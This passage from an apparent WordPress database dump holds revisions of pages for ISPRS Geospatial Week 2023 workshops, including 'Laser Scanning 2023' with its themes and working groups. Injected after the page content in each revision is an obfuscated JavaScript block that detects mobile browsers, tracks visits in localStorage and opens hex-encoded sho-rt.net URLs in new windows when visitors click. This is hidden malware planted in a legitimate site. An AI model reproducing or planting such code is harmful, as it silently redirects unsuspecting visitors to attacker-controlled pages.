_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2023-02-05 14:21:47','2023-02-05 14:21:47','',2993,'https://gsw2023.com/?p=3832',0,'revision','',0),
(3833,1,'2023-02-05 14:22:03','2023-02-05 14:22:03','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Laser Scanning 2023</strong></span></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\r\n<table width=\"0\">\r\n<tbody>\r\n<tr>\r\n<td width=\"288\">\r\n<h5><strong>Acquisition </strong></h5>\r\n•      Airborne, terrestrial, automotive, bathymetric LIDAR\r\n\r\n•      Range imaging and gaming sensors\r\n\r\n•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR\r\n\r\n•      Ubiquitous point cloud sensing and mapping\r\n\r\n&nbsp;</td>\r\n<td width=\"274\">\r\n<h5><strong>System and Signal analysis </strong></h5>\r\n•      Sensor and system calibration and validation\r\n\r\n•      Error modelling\r\n\r\n•      Data fusion (LiDAR, RADAR, imagery)\r\n\r\n•      Denoising\r\n\r\n&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td width=\"288\">\r\n<h5><strong>Point Cloud Processing </strong></h5>\r\n•      Point cloud registration &amp; denoising\r\n\r\n•      Segmentation\r\n\r\n•      Classification\r\n\r\n•      fusion\r\n\r\n•      3D Modelling\r\n\r\n•      Feature extraction and object recognition\r\n\r\n•      Change analysis\r\n\r\n•      Big Data processing\r\n\r\n•      Scan-to-BIM\r\n\r\n&nbsp;</td>\r\n<td width=\"274\">\r\n<h5><strong>Applications</strong></h5>\r\n•        Thematic mapping and monitoring\r\n\r\n•        Modelling anthropogenic and natural areas\r\n\r\n•        Natural resource mapping\r\n\r\n•        Biodiversity assessment\r\n\r\n•        Precision farming\r\n\r\n•        Forest mapping and carbon storage\r\n\r\n•        Geohazards analysis\r\n\r\n•        Infrastructure monitoring\r\n\r\n•        Large-scale urban modelling</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n<h5 style=\"text-align: justify; color: blue;\"><u>Scientific Committee:</u></h5>\r\ntbc.\r\n\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\r\n<ul>\r\n 	<li>WG II/2 Point cloud acquisition and processing</li>\r\n</ul>\r\n<u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2023-02-05 14:22:03','2023-02-05 14:22:03','',2949,'https://gsw2023.com/?p=3833',0,'revision','',0),
(3834,1,'2023-02-05 14:23:04','2023-02-05 14:23:04','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Laser Scanning 2023</strong></span></h5>\n<h5></h5>\n&nbsp;\n<h5 style=\"text-align: justify; color: black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n•      Airborne, terrestrial, automotive, bathymetric LIDAR\n\n•      Range imaging and gaming sensors\n\n•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR\n\n•      Ubiquitous point cloud sensing and mapping\n\n&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n•      Sensor and system calibration and validation\n\n•      Error modelling\n\n•      Data fusion (LiDAR, RADAR, imagery)\n\n•      Denoising\n\n&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n•      Point cloud registration &amp; denoising\n\n•      Segmentation\n\n•      Classification\n\n•      fusion\n\n•      3D Modelling\n\n•      Feature extraction and object recognition\n\n•      Change analysis\n\n•      Big Data processing\n\n•      Scan-to-BIM\n\n&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n•        Thematic mapping and monitoring\n\n•        Modelling anthropogenic and natural areas\n\n•        Natural resource mapping\n\n•        Biodiversity assessment\n\n•        Precision farming\n\n•        Forest mapping and carbon storage\n\n•        Geohazards analysis\n\n•        Infrastructure monitoring\n\n•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<u> </u>\n\n<u> </u>\n\n<u> </u>\n<h5 style=\"text-align: justify; color: blue;\"><u>Scientific Committee:</u></h5>\ntbc.\n\n&nbsp;\n<h5 style=\"text-align: justify; color: blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n 	<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 